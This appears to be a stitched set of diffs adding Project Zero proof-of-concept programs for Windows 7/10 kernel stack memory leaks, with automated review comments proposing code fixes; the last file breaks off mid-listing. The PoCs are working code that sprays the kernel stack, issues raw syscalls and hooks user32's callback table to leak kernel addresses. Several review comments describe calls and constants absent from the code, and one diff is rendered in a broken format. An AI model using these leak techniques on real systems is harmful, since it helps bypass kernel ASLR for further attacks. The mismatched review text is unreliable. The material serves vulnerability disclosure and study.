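Review bot: The early return on the GetStockObject() failure path leaks the DC created just above it, and the message names an API that is not called; that branch should read `printf("GetStockObject failed\n"); DeleteDC(hdc); return 1;`. CreateCompatibleDC(NULL) is itself unchecked, so hdc may be NULL when it reaches the syscall. The two `DeleteObject(hfont)` calls act on a stock-object handle and run while the font is still selected into hdc; they can be dropped, or the previous object from SelectObject() restored first. As with the sibling PoCs, 0x10d9 and `int 0x2e` are Windows 7 x86 service numbers, which the header only states as "other systems untested" and should call out explicitly.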
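--- /dev/null
+++ b/platforms/windows/dos/42226.cpp
@@ -0,0 +1,136 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1181
+
+We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7-10 through the win32k!NtGdiGetRealizationInfo system call.
+
+The concrete layout of the input/output structure is unclear (symbols indicate its name is FONT_REALIZATION_INFO), but the first DWORD field contains the structure size, which can be either 16 or 24. The internal win32k!GreGetRealizationInfo function then initializes a local copy of the structure on the kernel stack with an adequate number of bytes. However, the syscall handler later copies the full 24 bytes of memory back to user-mode, regardless of the declared size of the structure, and the number of bytes initialized within it:
+
+--- cut ---
+.text:BF86F307 mov edi, ecx
+.text:BF86F309
+.text:BF86F309 loc_BF86F309:
+.text:BF86F309 push 6
+.text:BF86F30B pop ecx
+.text:BF86F30C lea esi, [ebp+var_30]
+.text:BF86F30F rep movsd
+--- cut ---
+
+In other words, if we pass in a structure with .Size set to 16, the kernel will leak 8 uninitialized stack bytes back to us. This condition is illustrated by the attached proof-of-concept program, which first sprays 1024 bytes of the kernel stack with the 0x41 ('A') value, and then invokes the affected system call. The result of starting the program on Windows 7 32-bit is as follows:
+
+--- cut ---
+00000000: 10 00 00 00 03 01 00 00 2d 00 00 00 65 00 00 46 ........-...e..F
+00000010: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........
+--- cut ---
+
+It is clearly visible that the 8 trailing bytes are set to the leftover 'A's artificially set up to demonstrate the security issue.
+
+Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+*/
+
+#include <Windows.h>
+#include <cstdio>
+
+// For native 32-bit execution.
+extern "C"
+ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
+__asm{mov eax, ApiNumber};
+__asm{lea edx, ApiNumber + 4};
+__asm{int 0x2e};
+}
+
+VOID PrintHex(PBYTE Data, ULONG dwBytes) {
+for (ULONG i = 0; i < dwBytes; i += 16) {
+printf("%.8x: ", i);
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes) {
+printf("%.2x ", Data[i + j]);
+}
+else {
+printf("?? ");
+}
+}
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
+printf("%c", Data[i + j]);
+}
+else {
+printf(".");
+}
+}
+
+printf("\n");
+}
+}
+
+// Own implementation of memset(), which guarantees no data is spilled on the local stack.
+VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
+for (ULONG i = 0; i < size; i++) {
+ptr[i] = byte;
+}
+}
+
+VOID SprayKernelStack() {
+// Windows 7 32-bit.
+CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;
+
+// Buffer allocated in static program memory, hence doesn't touch the local stack.
+static BYTE buffer[1024];
+
+// Fill the buffer with 'A's and spray the kernel stack.
+MyMemset(buffer, 'A', sizeof(buffer));
+SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0);
+
+// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
+MyMemset(buffer, 'B', sizeof(buffer));
+}
+
+int main() {
+// Windows 7 32-bit.
+CONST ULONG __NR_NtGdiGetRealizationInfo = 0x10cb;
+
+// Create a Device Context.
+HDC hdc = CreateCompatibleDC(NULL);
+
+// Create a TrueType font.
+HFONT hfont = CreateFont(10, // nHeight
+10, // nWidth
+0, // nEscapement
+0, // nOrientation
+FW_DONTCARE, // fnWeight
+FALSE, // fdwItalic
+FALSE, // fdwUnderline
+FALSE, // fdwStrikeOut
+ANSI_CHARSET, // fdwCharSet
+OUT_DEFAULT_PRECIS, // fdwOutputPrecision
+CLIP_DEFAULT_PRECIS, // fdwClipPrecision
+DEFAULT_QUALITY, // fdwQuality
+FF_DONTCARE, // fdwPitchAndFamily
+L"Times New Roman");
+
+// Select the font into the DC.
+SelectObject(hdc, hfont);
+
+// Spray the kernel stack to get visible results.
+SprayKernelStack();
+
+// Read the uninitialized kernel stack bytes and print them on screen.
+DWORD output[6] = { /* zero padding */ };
+output[0] = 16;
+
+if (!SystemCall32(__NR_NtGdiGetRealizationInfo, hdc, output)) {
+printf("NtGdiGetRealizationInfo failed\n");
+DeleteObject(hfont);
+DeleteDC(hdc);
+return 1;
+}
+
+PrintHex((PBYTE)output, sizeof(output));
+
+// Free resources.
+DeleteObject(hfont);
+DeleteDC(hdc);
+
+return 0;
+}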
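Review bot: CreateFont() is never checked in main(), so if "Times New Roman" is not available hfont is NULL, SelectObject(hdc, NULL) fails, and the syscall runs against whatever font the DC already holds with no indication that the test object changed; add `if (hfont == NULL) { printf("CreateFont failed\n"); DeleteDC(hdc); return 1; }` after the CreateFont() call. The relationship between `output[0] = 16;` and `DWORD output[6]` deserves a comment on those lines: the declared size is 16 but the buffer must stay 24 bytes because, per the header, the handler copies six DWORDs regardless, and shrinking the array would turn the leak into a user-mode overflow. As in the sibling PoCs, hfont is deleted while still selected into hdc on both exit paths, and 0x129c/0x10cb with `int 0x2e` are Windows 7 x86 service numbers that the header should state explicitly.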
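--- /dev/null
+++ b/platforms/windows/dos/42227.cpp
@@ -0,0 +1,184 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1186
+
+We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other platforms untested) indirectly through the win32k!NtGdiOpenDCW system call. The analysis shown below was performed on Windows 7 32-bit.
+
+The full stack trace of where uninitialized kernel stack data is leaked to user-mode is as follows:
+
+--- cut ---
+9706b8b4 82ab667d nt!memcpy+0x35
+9706b910 92bf8220 nt!KeUserModeCallback+0xc6
+9706b954 92c01d1f win32k!pppUserModeCallback+0x23
+9706b970 92c096c8 win32k!ClientPrinterThunk+0x41
+9706ba24 92b0c722 win32k!UMPDDrvEnablePDEV+0x18c
+9706bc20 92b74bc4 win32k!PDEVOBJ::PDEVOBJ+0x1c5
+9706bca4 92b6b2a6 win32k!hdcOpenDCW+0x18c
+9706bd0c 82876db6 win32k!NtGdiOpenDCW+0x112
+9706bd0c 77486c74 nt!KiSystemServicePostCall
+0022fa18 772e9978 ntdll!KiFastSystemCallRet
+0022fa1c 772e9a0e GDI32!NtGdiOpenDCW+0xc
+0022fca8 772e9bab GDI32!hdcCreateDCW+0x1b1
+0022fcf4 772e9c5d GDI32!bCreateDCA+0xe4
+0022fd10 00405114 GDI32!CreateICA+0x18
+--- cut ---
+
+At the time of this callstack, the win32k!ClientPrinterThunk function invokes a user-mode callback #93 (corresponding to user32!__ClientPrinterThunk), and passes in an input structure of 0x6C bytes. We have found that 8 bytes at offset 0x4C and 12 bytes at offset 0x60 of that structure are uninitialized. We have tracked that this structure originates from the stack frame of the win32k!UMPDDrvEnablePDEV function, and is passed down to win32k!UMPDOBJ::Thunk in the 2nd argument.
+
+The uninitialized data can be obtained by a user-mode application by hooking the appropriate entry in the user32.dll callback dispatch table, and reading data from a pointer provided through the handler's parameter. This technique is illustrated by the attached proof-of-concept code (again, specific to Windows 7 32-bit). If we attach a WinDbg debugger to the tested system, we can set a breakpoint at the beginning of win32k!UMPDDrvEnablePDEV, manually initialize the overall structure copied to user-mode with a marker 0x41 ('A') byte after the stack frame allocation instructions, and then observe some of these bytes in the output of the PoC program. This indicates they were not initialized anywhere during execution between win32k!UMPDDrvEnablePDEV and nt!KeUserModeCallback(), and copied in the leftover form to user-mode. See below:
+
+--- cut ---
+1: kd> ba e 1 win32k!UMPDDrvEnablePDEV
+1: kd> g
+Breakpoint 0 hit
+win32k!UMPDDrvEnablePDEV:
+9629957c 6a7c push 7Ch
+0: kd> p
+win32k!UMPDDrvEnablePDEV+0x2:
+9629957e 68d0633796 push offset win32k!__safe_se_handler_table+0x7c98 (963763d0)
+0: kd> p
+win32k!UMPDDrvEnablePDEV+0x7:
+96299583 e828b4f8ff call win32k!_SEH_prolog4 (962249b0)
+0: kd> p
+win32k!UMPDDrvEnablePDEV+0xc:
+96299588 8d4de4 lea ecx,[ebp-1Ch]
+0: kd> f ebp-8c ebp-8c+6c-1 41
+Filled 0x6c bytes
+0: kd> g
+--- cut ---
+
+After executing the above commands, the program should print output similar to the following:
+
+--- cut ---
+[...]
+00000000: 6c 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 l...............
+00000010: 1c 03 11 59 d8 e2 31 00 74 02 c6 01 a8 06 c6 01 ...Y..1.t.......
+00000020: 06 00 00 00 00 00 c3 01 30 01 00 00 18 00 c3 01 ........0.......
+00000030: 2c 01 00 00 48 01 c3 01 30 21 a0 ff e4 06 c6 01 ,...H...0!......
+00000040: 84 9b 31 00 00 00 00 00 00 00 00 00 41 41 41 41 ..1.........AAAA
+00000050: 41 41 41 41 74 02 c3 01 74 02 c4 01 74 02 c5 01 AAAAt...t...t...
+00000060: 41 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? AAAAAAAAAAAA....
+[...]
+--- cut ---
+
+It's clearly visible that bytes at offsets 0x4c-0x53 and 0x60-0x6b are equal to the data we set in the prologue of win32k!UMPDDrvEnablePDEV, which illustrates how uninitialized stack data is leaked to user-mode.
+
+If we skip the manual initialization of bytes in the stack frame with a kernel debugger, an example output of the program is as follows:
+
+--- cut ---
+00000000: 6c 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 l...............
+00000010: 75 03 11 55 d8 e2 25 00 74 02 96 01 a8 06 96 01 u..U..%.t.......
+00000020: 06 00 00 00 00 00 93 01 30 01 00 00 18 00 93 01 ........0.......
+00000030: 2c 01 00 00 48 01 93 01 30 21 a0 ff e4 06 96 01 ,...H...0!......
+00000040: 84 9b 25 00 00 00 00 00 00 00 00 00[96 6f 89 82]..%..........o..
+00000050:[28 65 9d 84]74 02 93 01 74 02 94 01 74 02 95 01 (e..t...t...t...
+00000060: 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ................
+--- cut ---
+
+In the above listing, two kernel-mode addresses are leaked at offsets 0x4c and 0x50: an address of the ntoskrnl.exe image, and an address of a non-paged pool allocation:
+
+--- cut ---
+0: kd> !address 849d6528
+[...]
+
+Usage:
+Base Address: 84800000
+End Address: 84a00000
+Region Size: 00200000
+VA Type: NonPagedPool
+VAD Address: 0x8800000067317cf2
+Commit Charge: 0x1000165643ec0
+Protection: 0x8800000067317cf0 []
+Memory Usage: Private
+No Change: yes
+More info: !vad 0x84800000
+0: kd> !address 82896f96
+
+
+Usage: Module
+Base Address: 8281c000
+End Address: 82c38000
+Region Size: 0041c000
+VA Type: BootLoaded
+Module name: ntoskrnl.exe
+Module path: [\SystemRoot\system32\ntkrnlpa.exe]
+--- cut ---
+
+Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+*/
+
+#include <Windows.h>
+#include <cstdio>
+
+namespace globals {
+LPVOID (WINAPI *OrigClientPrinterThunk)(LPVOID);
+} // namespace globals;
+
+VOID PrintHex(PBYTE Data, ULONG dwBytes) {
+for (ULONG i = 0; i < dwBytes; i += 16) {
+printf("%.8x: ", i);
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes) {
+printf("%.2x ", Data[i + j]);
+}
+else {
+printf("?? ");
+}
+}
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
+printf("%c", Data[i + j]);
+}
+else {
+printf(".");
+}
+}
+
+printf("\n");
+}
+}
+
+PVOID *GetUser32DispatchTable() {
+__asm{
+mov eax, fs:30h
+mov eax, [eax + 0x2c]
+}
+}
+
+BOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler, PVOID *lpOrigHandler) {
+PVOID *DispatchTable = GetUser32DispatchTable();
+DWORD OldProtect;
+
+if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) {
+printf("VirtualProtect#1 failed, %d\n", GetLastError());
+return FALSE;
+}
+
+*lpOrigHandler = DispatchTable[Index];
+DispatchTable[Index] = lpNewHandler;
+
+if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) {
+printf("VirtualProtect#2 failed, %d\n", GetLastError());
+return FALSE;
+}
+
+return TRUE;
+}
+
+LPVOID WINAPI ClientPrinterThunkHook(LPVOID Data) {
+printf("----------\n");
+PrintHex((PBYTE)Data, ((PDWORD)Data)[0]);
+return globals::OrigClientPrinterThunk(Data);
+}
+
+int main() {
+if (!HookUser32DispatchFunction(93, ClientPrinterThunkHook, (PVOID *)&globals::OrigClientPrinterThunk)) {
+return 1;
+}
+
+HDC hic = CreateICA("Microsoft XPS Document Writer", "Microsoft XPS Document Writer", NULL, NULL);
+DeleteDC(hic);
+
+return 0;
+}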
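Review bot: The result of CreateICA() in main() is never checked, so on a machine without the "Microsoft XPS Document Writer" printer the callback never fires and the program exits 0 having printed nothing, which is indistinguishable from "no leak observed"; add `if (hic == NULL) { printf("CreateICA failed, %d\n", GetLastError()); return 1; }` before the DeleteDC() call. GetUser32DispatchTable() reads the table pointer at PEB offset 0x2c and the hook uses index 93, both of which the header ties to Windows 7 32-bit, and the `VirtualProtect(DispatchTable, 0x1000, ...)` pair assumes entry 93 lies within the first page of the table; a one-line comment on those lines naming these assumptions would save the next reader from rederiving them. ClientPrinterThunkHook() also trusts the first DWORD of the kernel-supplied buffer as the dump length, which matches the 0x6c described in the header but should be stated as the source of that value.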
219
platforms/windows/dos/42228.cpp
Executable file
@ -0,0 +1,219 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1189&desc=2
|
||||||
|
|
||||||
|
We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the JobObjectExtendedLimitInformation information class discloses portions of uninitialized kernel stack memory to user-mode clients, due to output structure alignment holes.
|
||||||
|
|
||||||
|
On our test Windows 7 32-bit workstation, an example layout of the output buffer is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................
|
||||||
|
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data is returned in a JOBOBJECT_EXTENDED_LIMIT_INFORMATION structure [1]. If we map the above shadow bytes to the structure definition, it turns out that the uninitialized bytes correspond to the alignment hole between the end of the JOBOBJECT_BASIC_LIMIT_INFORMATION structure and the beginning of the adjacent IO_COUNTERS structure. The length of the former is 0x2C (44), while the latter must be 8-byte aligned, so there is a gap at offsets 0x2C-0x2F, which is not initialized by the kernel.
|
||||||
|
|
||||||
|
The vulnerability can be easily demonstrated with a kernel debugger (WinDbg), by setting a breakpoint on nt!NtQueryInformationJobObject, manually filling out the structure memory with a marker byte (0x41), and then observing four of these bytes printed out by the attached proof-of-concept program:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
2: kd> bp nt!NtQueryInformationJobObject
|
||||||
|
2: kd> g
|
||||||
|
Breakpoint 0 hit
|
||||||
|
nt!NtQueryInformationJobObject:
|
||||||
|
818d5891 6890010000 push 190h
|
||||||
|
3: kd> p
|
||||||
|
nt!NtQueryInformationJobObject+0x5:
|
||||||
|
818d5896 68e0cf6981 push offset nt! ?? ::FNODOBFM::`string'+0x6100 (8169cfe0)
|
||||||
|
3: kd> p
|
||||||
|
nt!NtQueryInformationJobObject+0xa:
|
||||||
|
818d589b e8b8dbdeff call nt!_SEH_prolog4 (816c3458)
|
||||||
|
3: kd> p
|
||||||
|
nt!NtQueryInformationJobObject+0xf:
|
||||||
|
818d58a0 33f6 xor esi,esi
|
||||||
|
3: kd> f ebp-18c ebp-18c+70-1 41
|
||||||
|
Filled 0x70 bytes
|
||||||
|
3: kd> g
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
An example output on our test virtual machine is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 20 00 00 00 05 00 00 00 41 41 41 41 .... .......AAAA
|
||||||
|
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
Upon further investigation of the bug, we have determined the following:
|
||||||
|
|
||||||
|
- Not only the JobObjectExtendedLimitInformation (9), but also the JobObjectBasicLimitInformation (2) information class is affected by the vulnerability. The issue is very similar in that it also leaks 4 uninitialized bytes of kernel stack at offset 0x2C of the output structure. Since both classes are handled by the same or very close code areas, we are treating both cases as the same bug.
|
||||||
|
|
||||||
|
- Windows 10 (contrary to Windows 7) allows the output buffer for JobObjectExtendedLimitInformation to optionally be 120-bytes long instead of the typical 112. In that case, extra 4 kernel stack bytes are leaked at the end of the structure.
|
||||||
|
|
||||||
|
- It is possible to demonstrate the bug without resorting to a kernel debugger, by using the nt!NtMapUserPhysicalPages system call to spray the kernel stack with a large number of controlled bytes, and then invoking the affected nt!NtQueryInformationJobObject syscall directly, instead of through the QueryInformationJobObject() API.
|
||||||
|
|
||||||
|
To address all of the above new facts, I'm attaching a new proof-of-concept program, specific to Windows 10 1607 32-bit, which demonstrates the memory disclosure in all three possible settings: JobObjectBasicLimitInformation (output length 48), JobObjectExtendedLimitInformation (output length 112) and JobObjectExtendedLimitInformation (output length 120). An example output of the program is shown below:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
JobObjectBasicLimitInformation:
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
|
||||||
|
JobObjectExtendedLimitInformation (112):
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
|
||||||
|
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
JobObjectExtendedLimitInformation (120):
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
|
||||||
|
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000070: 00 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
|
||||||
|
--- cut ---
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <winternl.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
extern "C"
|
||||||
|
ULONG WINAPI NtMapUserPhysicalPages(
|
||||||
|
PVOID BaseAddress,
|
||||||
|
ULONG NumberOfPages,
|
||||||
|
PULONG PageFrameNumbers
|
||||||
|
);
|
||||||
|
|
||||||
|
// For native 32-bit execution.
|
||||||
|
extern "C"
|
||||||
|
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
|
||||||
|
__asm{mov eax, ApiNumber};
|
||||||
|
__asm{lea edx, ApiNumber + 4};
|
||||||
|
__asm{int 0x2e};
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
|
||||||
|
for (ULONG i = 0; i < size; i++) {
|
||||||
|
ptr[i] = byte;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID SprayKernelStack() {
|
||||||
|
// Buffer allocated in static program memory, hence doesn't touch the local stack.
|
||||||
|
static BYTE buffer[4096];
|
||||||
|
|
||||||
|
// Fill the buffer with 'A's and spray the kernel stack.
|
||||||
|
MyMemset(buffer, 'A', sizeof(buffer));
|
||||||
|
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
|
||||||
|
|
||||||
|
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
|
||||||
|
MyMemset(buffer, 'B', sizeof(buffer));
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
// Windows 10 1607 32-bit.
|
||||||
|
CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9;
|
||||||
|
|
||||||
|
// Create a job object to operate on.
|
||||||
|
HANDLE hJob = CreateJobObject(NULL, NULL);
|
||||||
|
|
||||||
|
// Spray the kernel stack with a marker value, to get visible results.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectBasicLimitInformation).
|
||||||
|
DWORD ReturnLength = 0;
|
||||||
|
BYTE output[120] = { /* zero padding */ };
|
||||||
|
|
||||||
|
NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectBasicLimitInformation, &output, sizeof(JOBOBJECT_BASIC_LIMIT_INFORMATION), &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationJobObject#1 failed, %x\n", st);
|
||||||
|
CloseHandle(hJob);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Print out the output.
|
||||||
|
printf("JobObjectBasicLimitInformation:\n");
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Spray the kernel again before invoking the affected system call.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 112.
|
||||||
|
ZeroMemory(output, sizeof(output));
|
||||||
|
|
||||||
|
st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 112, &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationJobObject#2 failed, %x\n", st);
|
||||||
|
CloseHandle(hJob);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Print the output again.
|
||||||
|
printf("JobObjectExtendedLimitInformation (112):\n");
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Spray the kernel again before invoking the affected system call.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 120.
|
||||||
|
ZeroMemory(output, sizeof(output));
|
||||||
|
|
||||||
|
st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 120, &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationJobObject#2 failed, %x\n", st);
|
||||||
|
CloseHandle(hJob);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Print the output again.
|
||||||
|
printf("JobObjectExtendedLimitInformation (120):\n");
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Free resources.
|
||||||
|
CloseHandle(hJob);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
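Review bot: The failure message for the third query, the 120-byte JobObjectExtendedLimitInformation call, still reads `NtQueryInformationJobObject#2 failed`, so a failure there cannot be told apart from the 112-byte call; it should be `printf("NtQueryInformationJobObject#3 failed, %x\n", st);`. The handle returned by `CreateJobObject(NULL, NULL)` is never checked, so a NULL handle is only caught indirectly through the syscall status; a guard such as `if (hJob == NULL) { printf("CreateJobObject failed, %u\n", GetLastError()); return 1; }` makes that failure explicit. The same unchecked handle appears in 42231.cpp and 42232.cpp.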
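--- a/platforms/windows/dos/42229.cpp
+++ b/platforms/windows/dos/42229.cpp
@@ -0,0 +1,148 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1190&desc=2
+
+We have discovered that the nt!NtQueryInformationProcess system call called with the ProcessVmCounters information class discloses portions of uninitialized kernel stack memory to user-mode clients, due to output structure alignment holes.
+
+On our test Windows 10 32-bit workstation, an example layout of the output buffer is as follows:
+
+--- cut ---
+00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000030: 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 ................
+--- cut ---
+
+Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data can be returned in a VM_COUNTERS_EX2 structure:
+
+--- cut ---
+typedef struct _VM_COUNTERS_EX {
+SIZE_T PeakVirtualSize;
+SIZE_T VirtualSize;
+ULONG PageFaultCount;
+SIZE_T PeakWorkingSetSize;
+SIZE_T WorkingSetSize;
+SIZE_T QuotaPeakPagedPoolUsage;
+SIZE_T QuotaPagedPoolUsage;
+SIZE_T QuotaPeakNonPagedPoolUsage;
+SIZE_T QuotaNonPagedPoolUsage;
+SIZE_T PagefileUsage;
+SIZE_T PeakPagefileUsage;
+SIZE_T PrivateUsage;
+} VM_COUNTERS_EX;
+
+typedef struct _VM_COUNTERS_EX2 {
+VM_COUNTERS_EX CountersEx;
+SIZE_T PrivateWorkingSetSize;
+ULONGLONG SharedCommitUsage;
+} VM_COUNTERS_EX2, *PVM_COUNTERS_EX2;
+--- cut ---
+
+If we map the above shadow bytes to the structure definition, it turns out that the uninitialized bytes correspond to the alignment hole between the PrivateWorkingSetSize and SharedCommitUsage fields. The PrivateWorkingSetSize field ends at offset 0x34 of the structure, while SharedCommitUsage must be 8-byte aligned, causing a gap to be introduced at offsets 0x34-0x37, which is not initialized by the kernel prior to being copied back to the client application.
+
+The attached proof of concept code works by first filling a large portion of the kernel stack with a controlled marker byte 0x41 ('A') using the nt!NtMapUserPhysicalPages system call, and then invokes the affected nt!NtQueryInformationProcess syscall. As a result, we can observe that these leftover bytes are indeed leaked to user-mode at offset 0x34 of the output structure:
+
+--- cut ---
+00000000: 00 50 a8 00 00 50 a8 00 9b 01 00 00 00 00 19 00 .P...P..........
+00000010: 00 00 19 00 48 45 00 00 98 44 00 00 30 0a 00 00 ....HE...D..0...
+00000020: 00 05 00 00 00 d0 05 00 00 c0 06 00 00 d0 05 00 ................
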